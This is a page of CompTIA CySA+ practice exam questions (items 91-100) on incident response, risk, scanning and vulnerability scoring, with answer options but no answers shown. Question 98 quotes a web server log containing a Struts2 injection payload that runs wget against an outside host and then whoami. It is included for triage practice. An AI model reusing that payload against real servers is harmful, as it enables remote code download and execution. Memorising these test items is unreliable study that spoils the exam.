Pass the CompTIA CompTIA CySA+ CS0-003 Questions and answers with CertsForce

Viewing page 10 out of 13 pages
Viewing questions 91-100 out of questions
Questions # 91:

An organization discovered a data breach that resulted in Pll being released to the public. During the lessons learned review, the panel identified discrepancies regarding who was responsible for external reporting, as well as the timing requirements. Which of the following actions would best address the reporting issue?

Options:

A.

Creating a playbook denoting specific SLAs and containment actions per incident type


B.

Researching federal laws, regulatory compliance requirements, and organizational policies to document specific reporting SLAs


C.

Defining which security incidents require external notifications and incident reporting in addition to internal stakeholders


D.

Designating specific roles and responsibilities within the security team and stakeholders to streamline tasks


Expert Solution
Questions # 92:

The security analyst received the monthly vulnerability report. The following findings were included in the report

• Five of the systems only required a reboot to finalize the patch application.

• Two of the servers are running outdated operating systems and cannot be patched

The analyst determines that the only way to ensure these servers cannot be compromised is to isolate them. Which of the following approaches will best minimize the risk of the outdated servers being compromised?

Options:

A.

Compensating controls


B.

Due diligence


C.

Maintenance windows


D.

Passive discovery


Expert Solution
Questions # 93:

Which of the following risk management decisions should be considered after evaluating all other options?

Options:

A.

Transfer


B.

Acceptance


C.

Mitigation


D.

Avoidance


Expert Solution
Questions # 94:

A security analyst is viewing a recorded session that captured suspicious activity:

scanning 192.168.10.10...

scan timing: about 10% done...

...

scan completed (4 host up); scanned 4 hosts in 1348 sec.

HOSt Port State Service

192.168.10.10 1 closed unknown

192.168.10.20 1 closed unknown

192.168.10.30 1 closed unknown

192.168.10.40 1 closed unknown

Which of the following best describes the activity shown?

Options:

A.

UDP scan


B.

SYN scan


C.

XMAS tree scan


D.

Half-open scan


Expert Solution
Questions # 95:

Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?

Options:

A.

SLA


B.

LOI


C.

MOU


D.

KPI


Expert Solution
Questions # 96:

A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve

this issue?

Options:

A.

Credentialed scan


B.

External scan


C.

Differential scan


D.

Network scan


Expert Solution
Questions # 97:

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

Options:

A.

Scope


B.

Weaponization


C.

CVSS


D.

Asset value


Expert Solution
Questions # 98:

An incident response team member is triaging a Linux server. The output is shown below:

$ cat /etc/passwd

root:x:0:0::/:/bin/zsh

bin:x:1:1::/:/usr/bin/nologin

daemon:x:2:2::/:/usr/bin/nologin

mail:x:8:12::/var/spool/mail:/usr/bin/nologin

http:x:33:33::/srv/http:/bin/bash

nobody:x:65534:65534:Nobody:/:/usr/bin/nologin

git:x:972:972:git daemon user:/:/usr/bin/git-shell

$ cat /var/log/httpd

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241)

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)

WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami)

at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.(FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334)

at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423)

Which of the following is the adversary most likely trying to do?

Options:

A.

Create a backdoor root account named zsh.


B.

Execute commands through an unsecured service account.


C.

Send a beacon to a command-and-control server.


D.

Perform a denial-of-service attack on the web server.


Expert Solution
Questions # 99:

When undertaking a cloud migration of multiple SaaS application, an organizations system administrator struggled … identity and access management to cloud-based assets. Which of the following service models would have reduced the complexity of this project?

Options:

A.

CASB


B.

SASE


C.

ZTNA


D.

SWG


Expert Solution
Questions # 100:

Which of the following explains the importance of a timeline when providing an incident response report?

Options:

A.

The timeline contains a real-time record of an incident and provides information that helps to simplify a postmortem analysis.


B.

An incident timeline provides the necessary information to understand the actions taken to mitigate the threat or risk.


C.

The timeline provides all the information, in the form of a timetable, of the whole incident response process including actions taken.


D.

An incident timeline presents the list of commands executed by an attacker when the system was compromised, in the form of a timetable.


Expert Solution
Viewing page 10 out of 13 pages
Viewing questions 91-100 out of questions